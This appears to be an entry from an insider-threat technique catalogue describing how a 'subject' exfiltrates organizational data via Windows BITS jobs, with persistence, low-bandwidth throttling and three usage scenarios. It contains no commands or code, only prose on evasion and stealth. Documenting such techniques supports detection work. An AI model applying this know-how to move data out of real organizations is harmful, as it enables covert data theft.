Exfiltration via Windows BITS

A subject may leverage the Windows Background Intelligent Transfer Service (BITS) to exfiltrate organizational data in a covert and resilient manner. BITS is a native Windows component designed to transfer files asynchronously over HTTP or SMB, typically used by system processes such as updates and patch delivery. Its trusted status, ability to throttle bandwidth, and support for job persistence make it an attractive mechanism for stealthy data exfiltration.

In this infringement method, the subject creates or modifies a BITS job, either via native utilities (e.g., bitsadmin, PowerShell cmdlets) or custom tooling, to upload sensitive files to an external endpoint under their control. Transfers may be disguised as legitimate background activity, leveraging standard ports and protocols to blend with normal system traffic.

BITS jobs can persist across reboots, retry on failure, and operate with minimal user interaction, allowing the subject to stage and gradually exfiltrate data over extended periods. In some cases, the subject may combine BITS with obfuscation techniques, such as renaming payloads, encrypting data prior to transfer, or using subject-controlled infrastructure that mimics legitimate services.

This technique is particularly effective in environments where outbound traffic is loosely controlled and where native Windows services are implicitly trusted, reducing the likelihood of immediate detection.

• Examples of Use
  A subject creates a BITS job using PowerShell to upload archived project files to an external HTTP server hosted on a personal VPS.
• A subject schedules a recurring BITS transfer that periodically sends collected documents to a remote endpoint, using low bandwidth to avoid triggering alerts.
• A subject modifies an existing BITS job to include additional file uploads to an attacker-controlled domain, blending activity with legitimate system update traffic.